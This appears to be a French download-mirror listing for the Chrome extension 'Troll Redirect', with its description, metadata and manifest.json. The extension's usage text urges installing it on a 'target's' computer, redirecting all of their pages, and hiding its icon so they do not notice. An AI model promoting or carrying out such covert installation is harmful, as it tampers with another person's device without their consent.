Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Qu'est-ce que Troll Redirect ?

Troll Redirect est une extension Chrome développée par Aaron Lockhart, et sa fonction principale est "Redirect all of your friend's webpages automatically by installing this on their computer!".

Captures d'Écran de l'Extension

screenshot

Télécharger le fichier CRX de l'extension Troll Redirect

Téléchargez les fichiers d'extension Troll Redirect au format crx, installez manuellement les extensions Chrome dans le navigateur ou partagez les fichiers crx avec des amis pour installer facilement les extensions Chrome.

Instructions d'Utilisation de l'Extension

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Informations de Base sur l'Extension

Nom Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
URL Officiel https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Description Redirect all of your friend's webpages automatically by installing this on their computer!
Taille du Fichier 949 KB
Nombre d'Installations 192
Version Actuelle 1.0
Dernière Mise à Jour 2018-12-06
Date de Publication 2018-12-02
Évaluation 4.75/5 Total 4 Évaluations
Développeur Aaron Lockhart
Email [email protected]
Type de Paiement free
Langues Prises en Charge en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}